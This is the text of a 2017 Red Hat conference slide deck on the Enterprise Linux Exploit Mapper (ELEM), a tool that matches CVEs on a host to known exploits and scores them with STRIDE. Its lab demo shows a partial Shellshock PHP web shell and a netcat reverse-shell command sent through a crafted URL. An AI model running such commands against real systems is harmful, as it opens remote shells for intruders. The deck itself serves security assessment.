Enterprise Linux Exploit Mapper (ELEM) Demo

ENTERPRISE LINUX EXPLOIT MAPPER
Simplifying Exploit Assessment
Kenneth D. Evensen
Solutions Architect
Jason Callaway
Principal Solutions Architect

ORIGINS OF THE TERM CYBER
Red Hat Defense in Depth 2017 - The Enterprise Linux Exploit Mapper (ELEM) and Demo2

https://fas.org/sgp/library/pccip.pdf

https://fas.org/sgp/library/pccip.pdf https://flic.kr/p/5Vso5o

https://fedoraproject.org/wiki/SIGs/Red_Team

Stuff we do (or will do, anyway)
FEDORA RED TEAM
• Offensive tooling
• Security Data API
• Fedora Cyber Test Lab
• Exploit curation
• Standards
• Reference architectures
First team meeting on Freenode IRC
#fedora-security
Friday, 6 October 2017, 10am Eastern

ENTERPRISE LINUX EXPLOIT MAPPER

MOTIVATION
To provide a comprehensive assessment of known exploits in the wild
against known CVE’s on an Enterprise Linux host.

The Tool - https://github.com/fedoraredteam/elem
ELEM
The Curation Data - https://github.com/fedoraredteam/elem-curation
ELEM CURATION
GitHub – Fedora Red Team
OPEN SOURCE PROJECTS

NIST Maintained U.S. Government repository of vulnerability data
Vulnerabilities are scored using CVSS - Common Vulnerability Scoring System
NATIONAL VULNERABILITY DATABASE
Mitre Corporation standardized identification and tracking for known vulnerabilities.
Provides description and references for the vulnerability.
COMMON VULNERABILITIES AND EXPOSURES
A library of known exploits curated by Offensive Security, LTD.
Exploits are often referenced by Mitre’s CVE database.
OFFENSIVE SECURITY EXPLOIT DATABASE
RELEVANT DATA SOURCES

Maintained by Red Hat Product Security
• List known CVE’s relevant to Red Hat software
• Provide CVSS scoring from NIST
• Base Score
• Attack Vector
• Provide customers with guidance for remediation
https://access.redhat.com/labs/securitydataapi
RED HAT SECURITY DATA API

ELEM - THEORY OF OPERATION

Determine which vulnerabilities apply to a specific host
Information comes from Red Hat’s Security Data API
ASSESS
Set up a known exploit to be executed
STAGE
Simply and comprehensively score the exploit
SCORE
ELEM - THEORY OF OPERATION
Break Down of Demonstration

https://msdn.microsoft.com/en-us/library/ee823878(v=cs.20).aspx
SCORING WITH STRIDE
• Spoofing identity. An example of identity spoofing is illegally accessing and then using another
user's authentication information, such as username and password.
• Tampering with data. Data tampering involves the malicious modification of data. Examples
include unauthorized changes made to persistent data, such as that held in a database, and the
alteration of data as it flows between two computers over an open network, such as the Internet.
• Repudiation. Repudiation threats are associated with users who deny performing an action
without other parties having any way to prove otherwise—for example, a user performs an illegal
operation in a system that lacks the ability to trace the prohibited
operations. Nonrepudiation refers to the ability of a system to counter repudiation threats. For
example, a user who purchases an item might have to sign for the item upon receipt. The vendor
can then use the signed receipt as evidence that the user did receive the package.

https://msdn.microsoft.com/en-us/library/ee823878(v=cs.20).aspx
SCORING WITH STRIDE
• Information disclosure. Information disclosure threats involve the exposure of information to
individuals who are not supposed to have access to it—for example, the ability of users to read a
file that they were not granted access to, or the ability of an intruder to read data in transit
between two computers.
• Denial of service. Denial of service (DoS) attacks deny service to valid users—for example, by
making a Web server temporarily unavailable or unusable. You must protect against certain types
of DoS threats simply to improve system availability and reliability.
• Elevation of privilege. In this type of threat, an unprivileged user gains privileged access and
thereby has sufficient access to compromise or destroy the entire system. Elevation of privilege
threats include those situations in which an attacker has effectively penetrated all system
defenses and become part of the trusted system itself, a dangerous situation indeed.

https://youtu.be/NX931nfyAmg

This exploit is somewhat contrived and we probably wouldn’t see it this way
in production.
SHOCK.PHP
<pre>
<?php
function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
...
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
....
?>

Invoke netcat on the target to create a connection back to the attacking host
 nc -nv 172.16.78.1 4444 -e /bin/bash
THE SCENARIO
http://rhel7.local.kenscloud.io/shock.php?cmd=nc%20-
nv%20172.16.78.1%204444%20-e%20/bin/bash
Ken’s Macbook Pro Ken’s RHEL 7 VM
with a Web Server
Malicious Web
Request Process the
Web Request
Shell Connection
Returned

Scores are sub-catagorized by Common Platform Enumeration (CPE)
notation. The theory is that an exploit on RHEL 7.0 Server may work better
or worse then RHEL 7.1 Desktop. The CPE is auto detected on a RHEL
host.
SCORING AN EXPLOIT
elem score --kind stride --value 0000009 --edbid 35370

SYSTEM
ADMINISTRATORS
SECURITY
RESEARCHERS PENETRATION TESTER
Determine and characterize the
threat of known exploits by using
testing and scoring exploits
Quickly assess a target host
decreasing time spent in a
penetration test
Understand what vulnerabilities
exist in their environment and
implement corrective action
Useful to Different Stakeholders
BROAD USER BASE

plus.google.com/+RedHat
linkedin.com/company/red-hat
youtube.com/user/RedHatVideos
facebook.com/redhatinc
twitter.com/RedHatNews
THANK YOU

Enterprise Linux Exploit Mapper (ELEM) Demo

More Related Content

What's hot (13)

Similar to Enterprise Linux Exploit Mapper (ELEM) Demo (20)

Recently uploaded (20)

Enterprise Linux Exploit Mapper (ELEM) Demo